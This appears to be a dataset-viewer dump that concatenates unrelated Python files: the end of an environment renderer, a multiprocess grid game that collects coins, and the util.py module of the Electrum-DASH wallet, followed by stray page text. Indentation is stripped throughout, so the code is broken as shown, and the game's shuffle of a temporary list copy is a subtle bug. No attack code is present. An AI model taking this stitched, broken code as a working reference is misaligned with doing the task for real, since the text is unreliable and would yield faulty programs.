remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
if self.viewer is not None:
self.viewer.close()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
bigimg = tile_images(imgs)
if mode == 'human':
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(bigimg[:, :, ::-1])
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
|
game.py
|
import threading
import copy
import time
import random
import multiprocessing as mp
UP = 0
DOWN = 1
LEFT = 2
RIGHT = 3
FREE = 0
WALL = 1
# Game state
STOPPED = 0
STARTED = 1
GAMEOVER = 2
class GameError(Exception):
pass
class PlaygroundError(Exception):
pass
class Playground(object):
FREE = 0
WALL = 1
def __init__(self, map):
if len(map) == 0:
raise PlaygroundError("Map has not rows")
for row in map:
if len(row) != len(map[0]):
raise PlaygroundError("Rows in map nave not got the same length")
self.map = map
self.width = len(map[0])
self.height = len(map)
self.points = []
def add_point(self, x, y):
if not self.is_free(x, y) or self.is_point(x, y):
raise PlaygroundError("Can not add point ({0}, {1})".format(x, y))
self.points.append((x, y))
def del_point(self, x, y):
if self.is_point(x, y):
self.points.remove((x, y))
else:
raise PlaygroundError("Can not remove point ({0}, {1})".format(x, y))
def is_point(self, x, y):
if not self.is_into(x, y):
return False
return (x, y) in self.points
def is_free(self, x, y):
if not self.is_into(x, y):
return False
return self.map[y][x] != WALL
def is_into(self, x, y):
return 0 <= x < self.width and 0 <= y < self.height
class PlayerInfo(object):
def __init__(self, player):
self.name = player.name
self.score = player.score
self.x = player.x
self.y = player.y
self.timeout = player.timeout
class Player(object):
def __init__(self, name, move_func, x=0, y=0):
self.name = name
self.score = 0
self.timeout = 0
self.move_func = move_func
# Function for move:
# move_function(info, ctx = None)
self.x = x
self.y = y
# Save history of all moves
self.history = []
self.history.append((x, y))
self.game_pipe, self.player_pipe = mp.Pipe()
self.process = None
# Are there any pending move requests
self.move_in_progress = False
def set_position(self, x, y):
self.x = x
self.y = y
def get_position(self):
return (self.x, self.y)
def start_player(self):
self.process = mp.Process(target=self.move_processor)
self.process.start()
def stop_player(self, timeout=5):
if self.process and self.process.is_alive():
# Try to terminate process normally
self.game_pipe.send(None)
self.process.join(timeout)
# Send SIGTERM to the process
if self.process.is_alive():
self.process.terminate()
self.process.join(timeout)
def move_processor(self):
print("Process '{}' started".format(self.name))
self.ctx = {}
while True:
try:
request = self.player_pipe.recv()
except Exception as e:
print("ERROR. Process '{}' on pipe receive. {}.".format(self.name, e))
break
if request is None:
break
try:
response = self.move_func(request, self.ctx)
except Exception as e:
print("ERROR. Process '{}' on move function. {}.".format(self.name, e))
break
try:
self.player_pipe.send(response)
except Exception as e:
print("ERROR. Process '{}' on pipe send. {}.".format(self.name, e))
break
print("Process {} stopped".format(self.name))
def move_request(self, gameinfo):
if self.move_in_progress:
self.timeout += 1
return
self.game_pipe.send(gameinfo)
self.move_in_progress = True
def move_result(self):
if self.move_in_progress:
if self.game_pipe.poll():
self.move_in_progress = False
return self.game_pipe.recv()
return None
class Game(object):
def __init__(self, playground, max_move, movetime=1):
self.state = STOPPED
self.playground = playground
self.movetime = movetime
self.max_move = max_move
self.n_move = 0
self.players = {}
self.lock = threading.Lock()
self.game_thread = threading.Thread(target=self._game)
self.stop = False
def add_player(self, player):
if self.state == STOPPED:
self.players[player.name] = player
else:
raise GameError("Can not add player. Game not in STOPPED state")
def do_player_move(self, player, move, start_game=False):
x, y = player.get_position()
if move == UP:
y -= 1
elif move == DOWN:
y += 1
elif move == LEFT:
x -= 1
elif move == RIGHT:
x += 1
elif not start_game:
return
self.lock.acquire()
if self.playground.is_free(x, y):
player.set_position(x, y)
if self.playground.is_point(x, y):
self.playground.del_point(x, y)
player.score += 1
if not start_game:
player.history.append((x, y))
self.lock.release()
def do_move(self):
self.n_move += 1
l_players = self.players.values()
random.shuffle(list(l_players))############3
for player in l_players:
info = self.player_info(player.name)
player.move_request(info)
time.sleep(self.movetime)
for player in l_players:
move = player.move_result()
if move is not None:
self.do_player_move(player, move)
def start_game(self):
for player in self.players.values():
player.start_player()
# Collect coins at statring game
self.do_player_move(player, 0, start_game=True)
self.game_thread.start()
self.state = STARTED
def stop_game(self):
# Stop game thread
self.stop = True
self.game_thread.join()
# Stop all players
for player in self.players.values():
player.stop_player()
def _game(self):
while True:
self.do_move()
if self.is_gameover():
self.state = GAMEOVER
break
def is_gameover(self):
if len(self.playground.points) == 0 or self.n_move >= self.max_move or self.stop:
return True
return False
def is_going(self):
return self.game_thread.is_alive()
def player_info(self, player_name):
info = dict()
info["map"] = copy.deepcopy(self.playground.map)
info["coins"] = copy.deepcopy(self.playground.points)
info["players"] = [(p.x, p.y) for p in self.players.values() if p.name != player_name]
info["x"] = self.players[player_name].x
info["y"] = self.players[player_name].y
return info
def get_points(self):
self.lock.acquire()
points = copy.deepcopy(self.playground.points)
self.lock.release()
return points
def get_players(self):
self.lock.acquire()
players = [PlayerInfo(p) for p in self.players.values()]
self.lock.release()
return players
def get_gameinfo(self):
info = {
"move": self.n_move,
"max_move": self.max_move
}
return info
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'DASH':8, 'mDASH':5, 'uDASH':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_headers_file_name():
from bitcoin import TESTNET
s = 'blockchain_headers'
if TESTNET:
s += '_testnet'
return s
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum-dash.electrum-dash'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-dash'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + android_headers_file_name()
old_headers_path = old_electrum_dir + android_headers_file_name()
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-dash")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-DASH")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-DASH")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Dash.org': ('https://explorer.dash.org',
{'tx': 'tx', 'addr': 'address'}),
'Bchain.info': ('https://bchain.info/DASH',
{'tx': 'tx', 'addr': 'addr'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Dash.org': ('https://test.insight.dash.siampm.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Dash.org')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Dash address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'dash':
raise BaseException("Not a Dash URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Dash address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='dash', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
return map(utfify, arg)
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.